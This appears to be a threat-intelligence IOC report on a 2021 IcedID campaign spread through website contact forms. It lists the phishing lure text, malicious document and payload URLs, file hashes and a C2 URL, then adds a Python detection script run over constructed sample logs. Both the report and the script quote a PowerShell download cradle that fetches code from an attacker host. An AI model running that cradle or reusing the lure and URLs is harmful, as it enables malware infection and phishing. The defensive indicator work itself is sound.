2021-10-26 Contact Forms IOCs (IcedID)
THREAT ATTRIBUTION: ICEDID
SUBJECTS OBSERVED
Contact Submission
SENDERS OBSERVED
EMAIL BODY
name: Alexis
email: [email protected]
message: Hi, I'm Alexis, I just noticed that there is the "error 500"
appearing on some of your website pages. I'm pretty positive that
those types of errors won't be appreciated by your customers and you
are basically losing money as a result, plus they can significantly
reduce the number of clicks from Google. I've decided to help and
created the document for you with a few screenshots of errors and also
indicated the links to the pages where they appear, hope it helps.
Here's the link to the doc, check it out:
https://storage.googleapis.com/m4b38h10cm38.appspot.com/gdrive/folders/0/public/d/4jn4v9fjn4d2.html?n=555440817225343472
Have a good day!
MALDOC DISTRIBUTION URLS
https://storage.googleapis.com/m4b38h10cm38.appspot.com/gdrive/folders/0/public/d/4jn4v9fjn4d2.html?n=555440817225343472
https://mossopia.top/bgstat60943/
https://drive.google.com/uc?export=download&id=1fm9WevIgigIEgV10TdZd7qOyeXpI677p
https://doc-0g-14-docs.googleusercontent.com/docs/securesc/nftb4o5rhrsr91v33bvevj7ar66f4guf/r90gu2taif0llot73d1k8s2btstivn53/1635265425000/10323111707164989971/00981599246008734149Z/1fm9WevIgigIEgV10TdZd7qOyeXpI677p?e=download
MALDOC FROM DISTRIBUTION URL
Critical Errors Report.zip
9989d49f7810cffcd07e21bfe8990e50
which contains:
Critical Errors Report.js
405b4502173e3cc554e6488f5016b107
POWERSHELL COMMANDS FROM MALDOC
IEX (New-Object Net.Webclient).downloadstring("http://zombateg.top/222g100/index.php")
ICEDID PAYLOAD DOWNLOAD URLS
http://zombateg.top/222g100/index.php
http://zombateg.top/222g100/main.php
ICEDID PAYLOAD FILE HASH
oJUfIy.bin
e6ecf3eaf39d7bd74dde633311d998a3
ICEDID C2
http://portedauthenticati.ink/
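A matcher for the indicators above, added here as a worked example and not part of the original IOC listing. It loads the URLs, MD5s and the PowerShell download cradle from this report, refangs pasted indicators (hxxp, [.]), keeps the Google-hosted stages on exact-URL match only because their hosts carry legitimate traffic, derives domain indicators from the attacker-registered hosts, and runs the whole set over constructed sample telemetry. The event field names (type, url, query, cmdline, md5) and every sample event are assumptions for the example, not real logs.

```python
"""IOC matcher for the 2021-10-26 IcedID contact-form campaign.

Added example, not part of the original IOC listing. Event field names are an
assumption; map them to whatever your SIEM emits. All sample events below are
constructed for the example.
"""
import re
from urllib.parse import urlsplit

# Indicators copied from the report above.
IOC_URLS = {
    "https://storage.googleapis.com/m4b38h10cm38.appspot.com/gdrive/folders/0/public/d/4jn4v9fjn4d2.html?n=555440817225343472",
    "https://mossopia.top/bgstat60943/",
    "https://drive.google.com/uc?export=download&id=1fm9WevIgigIEgV10TdZd7qOyeXpI677p",
    "https://doc-0g-14-docs.googleusercontent.com/docs/securesc/nftb4o5rhrsr91v33bvevj7ar66f4guf/r90gu2taif0llot73d1k8s2btstivn53/1635265425000/10323111707164989971/00981599246008734149Z/1fm9WevIgigIEgV10TdZd7qOyeXpI677p?e=download",
    "http://zombateg.top/222g100/index.php",
    "http://zombateg.top/222g100/main.php",
    "http://portedauthenticati.ink/",
}
IOC_MD5 = {
    "9989d49f7810cffcd07e21bfe8990e50": "Critical Errors Report.zip",
    "405b4502173e3cc554e6488f5016b107": "Critical Errors Report.js",
    "e6ecf3eaf39d7bd74dde633311d998a3": "oJUfIy.bin",
}
# Google-hosted stages share infrastructure with legitimate traffic, so they are
# matched on the exact URL only; attacker-registered hosts also get a domain match.
SHARED_HOSTS = {"storage.googleapis.com", "drive.google.com", "googleusercontent.com"}

# The cradle seen in Critical Errors Report.js, matched loosely so spacing, case
# and other target URLs still fire.
CRADLE_RE = re.compile(
    r"\bIEX\b.*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString\s*\(", re.I)
URL_RE = re.compile(r"https?://[^\s\"')]+")


def refang(s: str) -> str:
    """Undo common defanging so pasted indicators compare equal to raw log values."""
    return s.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def ioc_domains() -> set:
    """Attacker-controlled hostnames from IOC_URLS, with shared Google hosts excluded."""
    domains = set()
    for u in IOC_URLS:
        host = urlsplit(u).hostname
        if host and not any(host == h or host.endswith("." + h) for h in SHARED_HOSTS):
            domains.add(host)
    return domains


def classify_url(url: str):
    """'url' for an exact IOC hit, 'domain' for an attacker host, None otherwise."""
    url = refang(url)
    if url in IOC_URLS:
        return "url"
    if urlsplit(url).hostname in ioc_domains():
        return "domain"
    return None


def scan(events):
    """Return (event_index, reason) for every event that matches an indicator."""
    hits = []
    for i, ev in enumerate(events):
        t = ev.get("type")
        if t == "proxy":
            kind = classify_url(ev["url"])
            if kind:
                hits.append((i, f"{kind}:{urlsplit(refang(ev['url'])).hostname}"))
        elif t == "dns":
            if refang(ev["query"]).rstrip(".").lower() in ioc_domains():
                hits.append((i, "dns:" + ev["query"]))
        elif t == "process":
            cmd = refang(ev.get("cmdline", ""))
            if CRADLE_RE.search(cmd):
                hits.append((i, "powershell-download-cradle"))
            for url in URL_RE.findall(cmd):
                kind = classify_url(url)
                if kind:
                    hits.append((i, f"{kind}-in-cmdline:{urlsplit(url).hostname}"))
        elif t == "file":
            name = IOC_MD5.get(ev.get("md5", "").lower())
            if name:
                hits.append((i, "md5:" + name))
    return hits


# Constructed sample telemetry (not real logs); events 1 and 4 are benign controls.
SAMPLE_EVENTS = [
    {"type": "proxy", "url": "hxxps://mossopia[.]top/bgstat60943/"},
    {"type": "proxy", "url": "https://drive.google.com/uc?export=download&id=0B0000000000000000000000000000"},
    {"type": "dns", "query": "portedauthenticati.ink."},
    {"type": "process", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c IEX (New-Object Net.Webclient).downloadstring("http://zombateg.top/222g100/index.php")'},
    {"type": "process", "image": "powershell.exe", "cmdline": "powershell -c Get-Process"},
    {"type": "file", "path": r"C:\Users\user\Downloads\Critical Errors Report.zip",
     "md5": "9989D49F7810CFFCD07E21BFE8990E50"},
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_EVENTS):
        print(idx, reason)
```

The Drive and googleusercontent.com links are deliberately not turned into domain indicators: blocking those hosts would break legitimate traffic, and the signed googleusercontent.com download URL is transient, so it is only useful as an exact match against historical proxy logs. Hash matching is case-normalised because EDR and proxy products disagree on hex case.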